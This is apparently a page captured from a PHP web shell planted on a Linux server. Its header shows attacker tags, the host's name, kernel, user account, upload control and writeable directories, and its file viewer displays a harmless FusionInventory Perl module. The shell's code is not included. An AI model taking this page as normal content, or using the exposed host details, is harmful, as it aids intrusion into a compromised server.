Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /proc/thread-self/root/usr/share/fusioninventory/lib/FusionInventory/Agent/XML/Query/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/root/usr/share/fusioninventory/lib/FusionInventory/Agent/XML/Query/Inventory.pm
package FusionInventory::Agent::XML::Query::Inventory;

use strict;
use warnings;

use parent 'FusionInventory::Agent::XML::Query';

sub new {
    my ($class, %params) = @_;

    die "no content parameter for XML query\n" unless $params{content};

    return $class->SUPER::new(
        query => 'INVENTORY',
        %params
    );
}

1;
__END__

=head1 NAME

FusionInventory::Agent::XML::Query::Inventory - Inventory agent message

=head1 DESCRIPTION

This is an inventory message sent by the agent to the server, using OCS
Inventory XML format.

The data strcture format is documented in L<FusionInventory::Agent::Inventory>.


=head1 METHODS

=head2 new(%params)

The constructor. The following parameters are allowed, in addition to those
from the base class C<FusionInventory::Agent::XML::Query>, as keys of the
%params hash:

=over

=item I<content>

the inventory content (mandatory)

=back

Hry